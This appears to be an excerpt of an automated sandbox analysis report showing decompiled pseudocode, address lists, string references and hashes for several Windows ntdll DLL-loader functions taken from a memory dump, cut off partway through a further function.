0x04b73da0
0x04b73daf
0x04b73db5
0x04b73dba
0x04b73dba
0x04b73dd4
0x04b73e94
0x04b73eab
0x04b73f6d
0x04b73f84
0x04b7406b
0x04b7406b
0x04b7406e
0x04b7406e
0x04b74070
0x04b74074
0x04bc8351
0x04bc8351
0x04b7407a
0x04b7407f
0x04bc835d
0x04bc8370
0x04bc8377
0x04bc8379
0x04bc837c
0x04bc837c
0x04bc835d
0x00000000
0x04b7407f
0x04b73f8a
0x04b73f8d
0x04b73f90
0x04b73f95
0x04bc830d
0x04bc830f
0x04b73f9b
0x04b73fac
0x04b73fae
0x04b73fb1
0x04b73fb1
0x04b73fb6
0x04bc8317
0x04bc831a
0x00000000
0x04b73fbc
0x04b73fc1
0x04b73fc9
0x04b73fd7
0x04b73fda
0x04b73fdd
0x04b74021
0x04b74021
0x04b74029
0x04b74030
0x04b74044
0x04b74046
0x04b74046
0x04b74044
0x04b74049
0x04bc8327
0x04bc8334
0x04bc8339
0x04bc833c
0x04b7404f
0x04b7404f
0x04b7404f
0x04b74051
0x04b74056
0x04b74063
0x04b74063
0x04b74068
0x00000000
0x04b74068
0x04b73fdf
0x04b73fe2
0x04b73fe4
0x04b73fe7
0x04b73fef
0x04b74003
0x04b74005
0x04b74005
0x04b7400c
0x04b74013
0x04b74016
0x04b74017
0x04b7401b
0x04b7401e
0x00000000
0x04b7401e
0x04b73fb6
0x04b73eb1
0x04b73eb4
0x04b73eb7
0x04b73ebc
0x04bc82a9
0x04bc82ab
0x04b73ec2
0x04b73ed3
0x04b73ed5
0x04b73ed8
0x04b73ed8
0x04b73edd
0x04bc82b3
0x04bc82b6
0x00000000
0x04b73ee3
0x04b73ee8
0x04b73eed
0x04b73ef0
0x04b73ef3
0x04b73f02
0x04b73f05
0x04b73f08
0x04bc82c0
0x04bc82c3
0x04bc82c5
0x04bc82c8
0x04bc82d0
0x04bc82e4
0x04bc82e6
0x04bc82e6
0x04bc82ed
0x04bc82f4
0x04bc82f7
0x04bc82f8
0x04bc82fc
0x04bc82ff
0x04bc82ff
0x04b73f0e
0x04b73f11
0x04b73f16
0x04b73f1d
0x04b73f31
0x04bc8307
0x04bc8307
0x04b73f31
0x04b73f39
0x04b73f48
0x04b73f4d
0x04b73f50
0x04b73f50
0x04b73f53
0x04b73f58
0x04b73f65
0x04b73f65
0x04b73f6a
0x00000000
0x04b73f6a
0x04b73edd
0x04b73dda
0x04b73ddd
0x04b73de0
0x04b73de5
0x04bc8245
0x04b73deb
0x04b73df7
0x04b73dfc
0x04b73dfe
0x04b73e01
0x04b73e01
0x04b73e06
0x04bc824d
0x04bc824f
0x04bc8254
0x00000000
0x04b73e0c
0x04b73e11
0x04b73e16
0x04b73e19
0x04b73e29
0x04b73e2c
0x04b73e2f
0x04bc825c
0x04bc825f
0x04bc8261
0x04bc8264
0x04bc826c
0x04bc8280
0x04bc8282
0x04bc8282
0x04bc8289
0x04bc8290
0x04bc8293
0x04bc8294
0x04bc8298
0x04bc829b
0x04bc829b
0x04b73e35
0x04b73e38
0x04b73e3d
0x04b73e44
0x04b73e58
0x04bc82a3
0x04bc82a3
0x04b73e58
0x04b73e60
0x04b73e6f
0x04b73e74
0x04b73e77
0x04b73e77
0x04b73e7a
0x04b73e7f
0x04b73e8c
0x04b73e8c
0x04b73e91
0x00000000
0x04b73e91

Strings

Kernel-MUI-Number-Allowed, xrefs: 04B73D8C
Kernel-MUI-Language-Allowed, xrefs: 04B73DC0
Kernel-MUI-Language-SKU, xrefs: 04B73F70
Kernel-MUI-Language-Disallowed, xrefs: 04B73E97
WindowsExcludedProcs, xrefs: 04B73D6F

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 531d6d1ea50398c44f18aa70928d6c32b95e50eeffe48c9a00ef8fbd343fba27
Instruction ID: 0ceabe36d3531cf33dc4308893262e3910cafbf2df2361acf459b520f62e8f78
Opcode Fuzzy Hash: 531d6d1ea50398c44f18aa70928d6c32b95e50eeffe48c9a00ef8fbd343fba27
Instruction Fuzzy Hash: 68F13E72D00619EFDB11DF98C980AEEB7B9FF48754F1500AAE915A7250E734AE01DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04B98E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E04B98E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x4c5d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x4c58464; // 0x74e10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x4c55780 & 0x00000003) != 0) {
							E04BE5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x4c55780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E04BAB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x4c57984; // 0xa92b90
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x4c58464; // 0x74e10110
					 *0x4c5b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E04B99B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x4c55780 & 0x00000005) != 0) {
						_push(_t49);
						E04BE5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x04b98e0f
0x04b98e16
0x04b98e19
0x04b98e1b
0x04b98e21
0x04b98e7f
0x04b98e85
0x04bd9354
0x04bd936c
0x04bd9371
0x04bd937b
0x04bd9381
0x04bd9381
0x04bd937b
0x04b98e9d
0x04b98e9d
0x04b98e29
0x04b98e2c
0x04b98e38
0x04b98e3e
0x04b98e43
0x04b98eb5
0x04b98eb9
0x04bd92aa
0x04bd92af
0x04bd92e8
0x04bd92e8
0x04bd92af
0x04b98eb9
0x04b98e45
0x04b98e53
0x04b98e5b
0x04b98e5f
0x04b98e78
0x04b98e78
0x04b98e7d
0x04b98ec3
0x04b98ecd
0x04b98ed2
0x04b98ed2
0x04b98ec5
0x04b98ec5
0x00000000
0x04b98e7d
0x04b98e67
0x04b98ea4
0x04bd931a
0x00000000
0x00000000
0x04bd9320
0x04b98ea4
0x04b98e70
0x04bd9325
0x04bd9340
0x04bd9345
0x04bd9345
0x04b98e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 04BD932A
Querying the active activation context failed with status 0x%08lx, xrefs: 04BD9357
minkernel\ntdll\ldrsnap.c, xrefs: 04BD933B, 04BD9367
LdrpFindDllActivationContext, xrefs: 04BD9331, 04BD935D

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 7389a1506760b5ad5b4e16635e1e69a0fb1e31bd25475b072589e6bc41f2f7fa
Instruction ID: fb60bd40c0f2f4e37ab584c5a6d004379f53dd8039c7d915d2c10142c60cfc10
Opcode Fuzzy Hash: 7389a1506760b5ad5b4e16635e1e69a0fb1e31bd25475b072589e6bc41f2f7fa
Instruction Fuzzy Hash: A441E822A20B179FDF357E18C868B7977E4EB42354F0549F9E808571A1E774BC808681

Uniqueness

Uniqueness Score: -1.00%

Function 04B78794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E04B78794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E04B7934A() != 0) {
								_t159 = E04BEA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x4c55780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E04BE5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x4c55780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E04B7849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E04B78999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E04B78999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x4c55c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x4c55c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E04B82280(_t92, 0x4c586cc);
															_t94 = E04C39DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E04B961A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x4c55c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E04B78A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x4c55c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x4c55c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E04BAF380(_t136, 0x4b41184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E04B82280(_t108, 0x4c586cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E04B961A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E04C39D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E04B7FFB0(_t118, _t156, 0x4c586cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E04BA9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x04b78799
0x04b7879d
0x04b787a1
0x04b787a3
0x04b787a8
0x04b787c3
0x04b787c3
0x04b787c8
0x04b787d1
0x04b787d4
0x04b787d8
0x04b787e5
0x04b787ec
0x04bc9bfe
0x04bc9c00
0x04bc9c02
0x04bc9c08
0x04bc9c0d
0x04bc9c0f
0x04bc9c14
0x04bc9c2d
0x04bc9c32
0x04bc9c37
0x04bc9c3a
0x04bc9c3c
0x04bc9c42
0x04bc9c42
0x04bc9c3c
0x04bc9c02
0x04b787da
0x04b787df
0x04b787e3
0x00000000
0x00000000
0x04b787e3
0x04b787f2
0x00000000
0x04b787fb
0x04b787fd
0x04b787fe
0x04b7880e
0x04b7880f
0x04b78810
0x04b78814
0x04b7881a
0x04b7881c
0x04b7881f
0x04b78821
0x04b78822
0x04b78824
0x04b78826
0x04b7882c
0x04b7882e
0x04bc9c48
0x04bc9c48
0x04b78834
0x04b78834
0x04b78837
0x00000000
0x00000000
0x04b78837
0x04b7882e
0x04b7883d
0x04b78840
0x04b78843
0x04b78846
0x04b78849
0x04b7884c
0x04b7884e
0x04b78850
0x04b78852
0x04b78854
0x04b78857
0x04b788b4
0x04b788b6
0x04b788b6
0x04b78859
0x04b78859
0x04b78859
0x04b78861
0x04b78866
0x04b7886a
0x04b7893d
0x04b78941
0x00000000
0x04b78947
0x04b78947
0x04b7894a
0x04b7894c
0x00000000
0x04b78952
0x04b78955
0x04b7895a
0x04b7895d
0x04b7895d
0x04b7895f
0x04b78961
0x04b78961
0x04b78968
0x00000000
0x00000000
0x04b7896a
0x04b7896b
0x04b7896e
0x00000000
0x04b78970
0x04b78970
0x04b78970
0x04b78970
0x04b78972
0x04b78972
0x04b78974
0x00000000
0x04b7897a
0x04b7897a
0x04b7897d
0x00000000
0x04b78983
0x04bc9c65
0x04bc9c6d
0x04bc9c72
0x04bc9c75
0x04bc9c75
0x04bc9c82
0x04bc9c86
0x04bc9c87
0x04bc9c88
0x04bc9c89
0x04bc9c8c
0x04bc9c90
0x04bc9c95
0x04bc9c97
0x04bc9ca0
0x04bc9ca3
0x04bc9ca9
0x04bc9ca9
0x00000000
0x04bc9ca9
0x04bc9ca3
0x00000000
0x04bc9c97
0x04b7897d
0x00000000
0x04b78974
0x04b78988
0x04b78992
0x04b78996
0x00000000
0x04b78996
0x04b7894c
0x00000000
0x04b78870
0x04b7887b
0x04b7887d
0x04b7887f
0x04b78881
0x04b78884
0x04b78884
0x04b78886
0x04b78889
0x04b7888c
0x04b7888e
0x04b78891
0x04b78891
0x04b78898
0x00000000
0x00000000
0x04b7889a
0x04b7889b
0x04b7889e
0x00000000
0x00000000
0x04b788a0
0x04b788a8
0x04b788b0
0x04b788b2
0x04b788d3
0x04b788d5
0x00000000
0x04b788d7
0x04b788db
0x04b788dc
0x04b788e0
0x04b788e8
0x04b788ee
0x04b788f0
0x04b788f3
0x04b788fc
0x04b78901
0x04b78906
0x04b7890c
0x04b7890c
0x04b7890f
0x04b78916
0x04b78917
0x04b78918
0x04b78919
0x04b7891a
0x04b7891f
0x04b78921
0x04bc9c52
0x04bc9c55
0x04bc9c5b
0x04bc9cac
0x04bc9cc0
0x04bc9cc0
0x04bc9c55
0x04b78927
0x04b78927
0x04b7892f
0x04b78933
0x00000000
0x04b788f5
0x04b788f5
0x00000000
0x04b788f7
0x04b788f7
0x04b788fa
0x00000000
0x00000000
0x00000000
0x00000000
0x04b788fa
0x04b788f5
0x04b788f3
0x00000000
0x04b788d5
0x00000000
0x04b788b2
0x04b788c9
0x00000000
0x04b788c9
0x04b7887f
0x04b7886a
0x04b78857
0x04b78852
0x04b788bf
0x04b788bf
0x04b787aa
0x04b787ad
0x04b787ae
0x04b787b4
0x04b787b5
0x04b787b6
0x04b787b8
0x04b787bd
0x04b787c1
0x04b787f4
0x04b787fa
0x00000000
0x00000000
0x00000000
0x04b787c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 04BC9C28
LdrpDoPostSnapWork, xrefs: 04BC9C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04BC9C18

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: a5176438a2a11f281f33cf7d0eb369ddea46a317e83e8dd3213312a422ccbfda
Instruction ID: f8934ce83dc57da6208a871e0b3003bd0a479a51f06ce28db2dea3f345cf1806
Opcode Fuzzy Hash: a5176438a2a11f281f33cf7d0eb369ddea46a317e83e8dd3213312a422ccbfda
Instruction Fuzzy Hash: 8891E071A00216EFEF18EF59C485ABAB7B5FF84354B1540E9D825AB251EB30FD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04B77E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E04B77E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E04B7CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E04B6C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x4c55780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04BE5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x4c55780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E04B87D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04B87D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04BE7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E04B87D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04B87D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04BE7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E04B9A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E04B6B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x04b77e4c
0x04b77e50
0x04b77e55
0x04b77e58
0x04b77e5d
0x04b77e71
0x04b77f33
0x04b77e77
0x04b77e77
0x04b77e79
0x04b77e79
0x04b77e7e
0x04b77f45
0x04bc9848
0x00000000
0x04bc9848
0x04b77f4e
0x04b77f53
0x04b77f5a
0x00000000
0x00000000
0x04bc985a
0x04bc9862
0x04bc9866
0x00000000
0x04bc986c
0x00000000
0x04bc986c
0x04b77e84
0x04b77e84
0x04b77e8d
0x04bc9871
0x04b77eb8
0x04b77ec0
0x04b77ec0
0x04b77e9a
0x04bc987e
0x00000000
0x00000000
0x04bc9884
0x04bc988b
0x04bc98a7
0x04bc98ac
0x04bc98b1
0x04bc98b6
0x04bc98b8
0x04bc98b8
0x04bc98b9
0x00000000
0x04bc98b9
0x04b77ea0
0x04b77ea7
0x00000000
0x00000000
0x04b77eac
0x04b77eb1
0x04b77ec6
0x04b77ed0
0x04bc98cc
0x04b77ed6
0x04b77ed6
0x04b77ed6
0x04b77ede
0x04b77ee3
0x04bc98e3
0x04bc98f0
0x04bc9902
0x04bc98f2
0x04bc98fb
0x04bc98fb
0x04bc9907
0x04bc991d
0x04bc991d
0x04bc9907
0x04bc98e3
0x04b77ef0
0x04b77f14
0x04b77f14
0x04b77f1e
0x04bc9946
0x04b77f24
0x04b77f24
0x04b77f24
0x04b77f2c
0x04bc996a
0x04bc9975
0x04bc9975
0x04bc997e
0x04bc9993
0x04bc9993
0x04bc997e
0x00000000
0x04b77ef2
0x04b77efc
0x04b77f0a
0x04b77f0e
0x04bc9933
0x00000000
0x04bc9933
0x00000000
0x04b77f0e
0x00000000
0x00000000
0x00000000
0x04b77eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 04BC98A2
Could not validate the crypto signature for DLL %wZ, xrefs: 04BC9891
LdrpCompleteMapModule, xrefs: 04BC9898

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 1a8e307e7f77d5d3490676bcce02d404924c4dc0565c5ef0bed1a920b8911b14
Instruction ID: aab49d93d8dfce77dfde874d940dff559692f5610be2f5def9c06a64271a110a
Opcode Fuzzy Hash: 1a8e307e7f77d5d3490676bcce02d404924c4dc0565c5ef0bed1a920b8911b14
Instruction Fuzzy Hash: 3651E0716007459FEB21CF68C984B2ABBE8EB41714F1409E9E8619B7E1DB74FD00CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04B6E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04B6E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
